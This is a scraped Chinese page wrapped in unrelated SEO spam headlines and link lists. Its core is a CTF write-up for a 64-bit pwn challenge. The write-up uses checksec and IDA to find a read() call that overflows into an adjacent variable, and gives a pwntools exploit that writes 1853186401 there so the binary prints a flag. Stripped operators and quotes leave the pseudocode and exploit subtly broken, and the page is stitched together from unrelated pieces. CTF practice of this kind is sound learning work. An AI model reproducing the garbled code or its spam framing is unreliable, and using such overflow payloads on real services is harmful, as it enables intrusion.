当前位置: 首页 > news >正文

上海做营销网站哪个公司好做行业网站能赚钱吗

上海做营销网站哪个公司好,做行业网站能赚钱吗,黄骅市属于哪个省市,seo单词优化使用checksec查看ELF文件信息 checksec 4f2f44c9471d4dc2b59768779e378282 这里只需要注意两个重点#xff1a; Arch#xff1a;64bit的文件#xff0c;后面写exp的重点 Stack#xff1a;No canary found 没有栈溢出保护 使用IDA对ELF文件进行反汇编 双击左侧的函数栏…使用checksec查看ELF文件信息 checksec 4f2f44c9471d4dc2b59768779e378282 这里只需要注意两个重点 Arch64bit的文件后面写exp的重点 StackNo canary found 没有栈溢出保护 使用IDA对ELF文件进行反汇编 双击左侧的函数栏中的main函数 再按F5对main函数进行反汇编 获得C的伪代码 __int64 __fastcall main(int a1, char **a2, char **a3) {alarm(0x3Cu);setbuf(stdout, 0LL);puts(~~ welcome to ctf ~~ );puts(lets get helloworld for bof);read(0, unk_601068, 0x10uLL);if ( dword_60106C 1853186401 )sub_400686();return 0LL; } 代码分析 双击sub_400686函数查看具体执行动作 如图 这个函数的作用就是运行系统命令 cat 查看当前目录的flag.txt内容 思路很明显只要想办法使得dword_60106C 1853186401就能查看flag 双击变量dword_60106C 发现read函数中的unk_601068正好在dword_60106C的后第4个字节 PSread(0, unk_601068, 0x10uLL); 在cmd启动python也可以把地址扔进去相减 计算一下字节长度也是一样的算出来四个字节 思路 解题方法很明显了往read函数里扔4个字节的数据 使stack栈溢出字节数正好到dword_60106C的位置 再传入64bit的1853186401整型数就可以了 EXP 把IP地址和端口号换成题目给的 保存为test.py然后运行一下 from pwn import *payload ba*4 p64(1853186401) #构建字符串使栈溢出connectremote(IP地址,端口号) #构建连接connect.sendline(payload) #发送字符串connect.interactive() #开启shell交互接收回返信息 直接就输出了flag cyberpeace{791d122847943b51a06f5cbe52a37b6b}
http://www.zqtcl.cn/news/912579/

相关文章:

  • 凡科免费做网站蜂箱尺寸与制作图片
  • 完全不收费的聊天软件班级优化大师下载安装app
  • 合肥网站改版360免费建站永久免费
  • 商业网站建设案例课程 下载工信部企业网站认证
  • 泉州网站设计哪家公司好沈阳seo代理计费
  • 做景观素材有哪几个网站国内建网站费用
  • 驻马店重点项目建设网站wordpress常规选项
  • 网站开发 英文网站策划建设阶段的推广
  • 建立网站一般多少钱wordpress评论跳过验证
  • 南京每月做社保明细在哪个网站查看设计作品的网站软件
  • html怎么做网站如何在腾讯云上网站建设
  • 网站建设怎么链接表格手机做外贸有什么好的网站
  • 深圳开发网站建设哪家好外贸网络营销培训
  • 广州智迅网络做网站免费下载ps素材网站
  • 什么网站时候做伪静态开发软件定制
  • 找人做网站 多少钱西宁市公司网站建设
  • 网页设计 教程网站找权重高的网站方法
  • 网站建设本地还是外地重庆seo排名方法
  • 那个网站做网编好昨晚兰州发生了什么事
  • 温州建设局网站首页哪里可以学做资料员的网站
  • 网站怎样在360做优化wordpress文章图片在线裁剪
  • 彭州建设网站建设网站哪间公司比较好
  • qq空间网站根目录慧聪网首页
  • 制作小程序和网站的公司杭州品牌设计公司
  • 显示网站翻页代码wordpress 金融 模板下载
  • 用双语网站做seo会不会phpmysql网站
  • 长沙专业网站建设公司优惠券怎么做自己的网站
  • 做网站如何宣传怎么弄公众号
  • seo网站策划书网站建设资金投入
  • 做网站东莞东莞建网站wordpress 多文件上传